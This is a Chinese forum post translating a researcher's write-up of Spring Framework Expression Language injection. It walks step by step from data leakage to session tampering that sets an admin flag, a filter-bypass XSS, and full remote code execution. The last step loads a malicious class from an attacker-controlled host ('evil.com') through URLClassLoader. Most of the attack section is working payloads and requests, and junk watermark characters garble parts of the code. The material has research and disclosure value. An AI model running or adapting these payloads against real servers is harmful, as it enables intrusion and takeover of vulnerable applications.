找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2324|回复: 0
打印 上一主题 下一主题

spring-远程代码注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:47:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Remote Code with4 V2 Q7 O2 l# c" T
Expression Language Injection
1 h+ [* {. F' D" w( R, i+ E/ t: x! fSpring Framework脆弱性—DanAmodio
* H/ Z' W) w$ ?+ b全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中! u: L3 F8 U1 Z
可能会存在风险。3 {, l( h) U8 t! Q1 p; D/ x4 R: h
在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的$ A1 S* @1 R& P% c) z0 p7 M5 e9 e9 h2 n
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可7 T7 M5 y4 i% m, V3 U; {
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,) O, j0 x# S/ Y" K5 |+ z3 ]* y
以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前
% S" U4 z! B0 a6 T5 o5 e& J- o  O版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。# u; }1 u7 J4 J2 u$ g& z5 a/ h
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但
+ K7 L' V) v% |% [( {' e我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版+ j& w1 Q0 F9 r
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。, [1 @: O7 g* _! {7 d/ ?
这些版本不支持禁用double EL resolution.
5 U7 B9 u% \- J+ t* ]这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含' m3 i6 m9 n1 d2 Y. M3 a! k2 f0 u9 `
EL2.2容器上可能进行远程代码执行。
! d. p/ C/ q/ G+ }7 k3 Z这是一个原始信息泄露的攻击例子:. \- P1 d2 l1 B: H& x. Y
请求:6 d* w' g- w0 G# y
ttp://vulnerable.com/foo?message=${applicationScope}6 P! F7 ~1 M; l# _  _6 F
到达以下内容页面:
! S+ Y4 z, s# F  }  B结果将输出一些包含内部服务器信息calsspath 和本地工作目录
+ |2 s# q: ^; m1 `; |% o$ i- i, [你也可以做一些其他事情,如这样:0 `, Z& ?1 h, h
${9999+1}
, k2 S; e6 H% q7 X9 D9 Y还可以访问session 对象和beans' w( [2 a" ~2 E7 ~7 S
${employee.lastName}
4 S5 B6 W/ H$ [在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
# k1 u! {. o# @; V! pEL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东
/ l5 W* t( v# Q  y' N: b西,比如XSS.2 n. A2 m4 y/ \% S+ [
哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签; d" x8 N2 `% H, I
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
, N* }* f2 T& w呢?”  P! u1 X" V! z8 u# w# s
因此,我尝试巳缦拢�
% i% S# A7 x! ?# g6 yhttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP
' G* H% ~. u+ F; `+ s: {) A. [- SP
! Y2 W: k2 f* c& M& H我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返; v. I' f. ]! S
回的文本被插入进了spring:message 标签。: `) b: Y$ D! r; \% q) L- [
这里是一个最终绕过过滤的实例:
& n" g( {8 G" j6 N0 w5 y4 xhttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1)/scriptQ
- `4 U0 I& k- `% {1 H它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为/ c, g% N. z- D: A/ }
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?
1 C: ^. c" }  U6 c0 z& k经过一番研究,我学习到EL2.2 增加了方法调用。
$ I- B2 |" A! I6 J& g# }( I我写了一个快速测试应用程序代码并且检测一些功能0 T8 ?/ b) w# C2 ^( d
${pageContext.request.getSession().setAttribute(“account”,”123456″)}: {0 t" H5 ]. `- K: C  l6 r
${pageContext.request.getSession().setAttribute(“admin”,true)}5 f5 Q, \+ t: H' a/ ^5 h
好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
' |& f1 Z6 _# S6 ?! D$ h指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?
6 n# q) V! C. ~2 ]${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1' P( I0 o, K2 \
“, 1234)}
5 T7 \# w' ]& G${“”.getClass().forName(“java.lang.Runtime”)}
& Q# |; w1 t3 |6 g0 n+ T哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不$ t" [  c" v1 X% Q! x
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函5 n* N1 f- a. @% A1 y2 p0 c4 _
数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有* m+ N5 k. A1 Y3 Y* Y0 n
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
% \& y/ J+ t0 v. x" D方法签名invoke(Object obj, Object„ args)1 ~& |8 K2 R$ y/ o; o$ L  `% k8 ]# S' R0 x
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问% L  w* a6 s% s! ^* U7 s9 z
题,以让它可以工作起来。
* T+ C6 S. B4 S. e" I: i' l漏洞利用:
& o& W" d$ V  }3 z' K1 j" U我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
% p6 G2 ]; M2 w" G/ K+ Y; x希望你们中的一些JAVA奇才告诉我我是如此的可笑。( U6 C/ G% {; j, p* D- W1 N6 A0 d
这里有一些我试过的失败的用例,为了试图让它工作的用例:
2 X8 t+ g  E5 o5 w3 a 写文件到文件系统
" S4 [3 S6 c; r5 k2 ]6 z, m  Y; i 试图载入org.springframework.expression.spel.standard.SpelExpressionParser.
  |5 N" O5 O/ [* c9 |# \我认为这些可以很好的工作,但是我不能找到合适的类来载入。
9 T# e6 Q5 k- v, R. n0 y${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}
: u/ \3 K3 e; djavax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:/ E, `) c$ P7 n7 m7 A6 f5 q
org.springframework.expression.spel.standard.SpelExpressionParser not found/ J  K! C8 ]' {
by
* w, q  G" I+ W" x4 torg.glassfish.web.javax.servlet.jsp [194].9 l$ E+ h) f2 G/ ?! X2 ~  i% k
 利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
( O9 S2 n3 K: [0 _. K' s/ _ 利用反射来创建一个新的Runtime(and watch the world burn)2 n! m# T# o  X. L7 X0 V" z
${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName
4 q9 P; j, R+ Q+ [) f(“java.lang.Runtime”)).getDeclaredConstructors()[0])}6 E" v7 U# c8 I& Y+ C6 {
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}- _2 E" [4 i7 z' D
 使用java.lang.ProcessBuilder
5 b3 z% i, T7 k1 |' @+ ?3 _ 用表达式语言来评估表达式语言5 N% x- ]- G  K
Expression-ception ! 在这点我想我快疯了,载体并没有任何实际意义./ C, O" i- U( b9 ^
${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request' j0 V1 J1 x0 C
“,”".getClass(),null)}+ j% U; Y: _2 j7 x
 创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)9 a' w6 ?  Y  l; Y5 ]1 ^
我在使用一个空数组通过Method.invoke()时失败了很多次
) \) [' g4 S) s  K! V2 _6 @“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo
% _, f& A# h: Y, J.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A
0 h$ i8 D9 C/ J; A1 u; `" HrrayList”).newInstance().toArray())
3 D& ]; n/ P& V6 @5 ?6 t( tjava.lang.IllegalArgumentException: wrong number of arguments
: Q% x! S+ U1 r1 `最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可" }7 V0 `' u5 h3 y* \% t
以创建一个恶意class文件并且指向类装载器.
3 \6 a- w7 }& E2 g' i7 E我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:* i. u5 F) s" I1 J
public class Malicious {4 _# ^/ a6 z" X) b. |
public Malicious() {' \4 S/ v4 L, L5 Z1 f
try {
5 i4 t2 J& I% d" u' z8 _; ?- O" xjava.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac0 p6 X5 E: e8 X& E- u( o1 H1 t
java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
7 d6 A" w" S9 c5 x* L- p+ {} catch (Exception e) {
/ _, T, L# \# o}7 z: M1 ^: P# |9 N5 g
}
+ f% Y: y* H$ D+ F9 u8 R4 `" H* r$ a我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
: `( w% E% t" h& z2 K# P. M1 X话中,因此它可以被使用.! [' K3 e- G. R# m& R
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName3 k7 Y! N1 M+ W, R" X
(“java.util.ArrayList”).newInstance())}0 b* E0 j4 z* H; k: s+ P5 p- h
URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建- x* v& w  V* p* @- P
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
) |9 v. E" X! x5 [- qgetResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个- }/ Y9 B' A5 R9 e) A; d
我们可以调用的create(string)方法,然后转换对一个URL对象。* R  B3 S/ i" Y
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
( m7 P$ y7 E) n+ l; Nere/malicious/classfile/is/located/”).toURL())}+ K% g: {4 U' Z" K8 O
然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,
; S: B$ P& K+ t5 Q* F! `, j& H! e恶意类文件被装载并创建,触发远程代码.
4 i6 t* ^( v6 a$ i7 H6 H5 j) @# l${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte3 l+ C; v/ U6 E7 @7 u1 [% l' o
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().: M& ~: C5 d; F1 `% Y1 b* k
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance
2 k& l- S2 c: _+ B0 I% u; H3 k()}
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表